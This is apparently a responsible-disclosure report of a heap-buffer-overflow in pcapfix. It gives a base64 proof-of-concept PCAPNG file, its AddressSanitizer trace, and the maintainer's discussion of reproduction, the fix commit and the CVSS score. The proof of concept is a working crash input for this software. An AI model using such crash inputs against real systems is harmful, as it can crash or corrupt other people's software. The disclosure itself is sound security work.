Heap-based Buffer Overflow in rup0rt/pcapfix
Reported on
Jun 6th 2021
✍️ Description
Whilst testing pcapfix built from commit 5c2965 with Clang 13 (+ASan) on Ubuntu 20.04.2 LTS, we discovered a PCAPNG file which triggers a heap-buffer-overflow during a memcpy operation.
🕵️♂️ Proof of Concept
echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap && ./pcapfix -s -v /tmp/fuzz.pcap
The above POC produces this output including Address Sanitizer stack trace:
[*] Reading from file: /tmp/fuzz.pcap
[*] Writing to file: fixed_fuzz.pcap
[*] File size: 39 bytes.
[+] This is a PCAPNG file.
[*] FOUND: Section Header Block at position 0 (0 bytes)
[-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED.
[-] Major version number: 63666 ==> CORRECTED.
[-] Minor version number: 20 ==> CORRECTED.
[*] Section length: 143324300181504 ==> SETTING TO -1
[*] Block size adjusted (0 --> 28).
=================================================================
==2393459==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe43f9a430 sp 0x7ffe43f99bf0
READ of size 28 at 0x602000000051 thread T0
#0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3)
#1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10
#2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7
#3 0x4c9eec in main /root/pcapfix/pcapfix.c
#4 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d)
0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051)
allocated by thread T0 here:
#0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd)
#1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17
#2 0x4c9eec in main /root/pcapfix/pcapfix.c
#3 0x7ff8d3b780b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy
💥 Impact
This vulnerability is capable of crashing the software, causing memory corruption, and any other unintended consequences of reading past the end of the buffer.
Occurrences
I have contacted the maintainer via a GitHub Issue and will await a response from them.
I cannot reproduce this crash on Debian 11/unstable.
[] Reading from file: fuzz.pcap [] Writing to file: fixed_fuzz.pcap [] File size: 39 bytes. [+] This is a PCAPNG file. [] FOUND: Section Header Block at position 0 (0 bytes) [-] Unknown Byte Order Magic: 0xb2c3d4d3 ==> CORRECTED. [-] Major version number: 63666 ==> CORRECTED. [-] Minor version number: 20 ==> CORRECTED. [] Section length: 143324300181504 ==> SETTING TO -1 [] Block size adjusted (0 --> 28). [-] Did not hit the end of the block! (-28 bytes left) [-] Block size mismatch (0xb28ff5a0 != 0x00000000) ==> CORRECTED. [] Trying to align next block... [-] Found 11 bytes of unknown data ==> SKIPPING. [] No more valid blocks found inside file! (maybe it was the last one) [+] SUCCESS: 6 Corruption(s) fixed!
Also I do not understand why this crashes. Writebuffer is 1M: writebuffer = malloc(1024000); And it wants to write 28 bytes (block_pos) as you can see in your output. And it checks the size before memcpy: if (writepos + block_pos > 1024000) { [...] Please help me understand the cause of the crash.
Additionally I do not agree on high severity ;) There is no chance you reach this score on CVSS3 with reasonable assumptions.
git log | head
commit 5c2965f84a90efd3fd724dc6d40d895115abf103
CC=clang-13 CFLAGS="-fsanitize=address" make
echo "Cg0NCgAAAADT1MOysvgUAAAAAEpaggAAoPWPsvgUAAAAAAAAAAAA" | base64 -d > /tmp/fuzz.pcap
./pcapfix -s -v /tmp/fuzz.pcap
==2551156==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000000051 at pc 0x0000004334b4 bp 0x7ffe908c34b0 sp 0x7ffe908c2c70
READ of size 28 at 0x602000000051 thread T0
#0 0x4334b3 in __interceptor_memcpy (/root/pcapfix/pcapfix+0x4334b3)
#1 0x4dfb9d in memcpy /usr/include/x86_64-linux-gnu/bits/string_fortified.h:34:10
#2 0x4dfb9d in fix_pcapng /root/pcapfix/pcapng.c:1361:7
#3 0x4c9eec in main /root/pcapfix/pcapfix.c
#4 0x7f469f2110b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
#5 0x41c58d in _start (/root/pcapfix/pcapfix+0x41c58d)
0x602000000051 is located 0 bytes to the right of 1-byte region [0x602000000050,0x602000000051)
allocated by thread T0 here:
#0 0x497acd in __interceptor_malloc (/root/pcapfix/pcapfix+0x497acd)
#1 0x4d829e in fix_pcapng /root/pcapfix/pcapng.c:210:17
#2 0x4c9eec in main /root/pcapfix/pcapfix.c
#3 0x7f469f2110b2 in __libc_start_main /build/glibc-eX1tMB/glibc-2.31/csu/../csu/libc-start.c:308:16
SUMMARY: AddressSanitizer: heap-buffer-overflow (/root/pcapfix/pcapfix+0x4334b3) in __interceptor_memcpy
I find 7.8 to be reasonable as far as a severity goes for a local heap-buffer-overflow, but I'm open to changing the severity once the root cause is discovered.
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:H
According to CVSS definitions scope is unchanged and complexity is high. Results in 6.7. I still cannot reproduce this crash, but I am going add more boundary checks to the pcapng routines.
I added additional header checks. Can you please check latest devel branch commit (fb723c83) whether this crash still happens?
This crash is fixed by commit fb723c83. I will ask Jamie to update the CVSS from 7.8 to 6.7.
No worries, can you suggest the new vector string for the CVSS, so that I can update it in our database?
I believe this is a more accurate score: CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H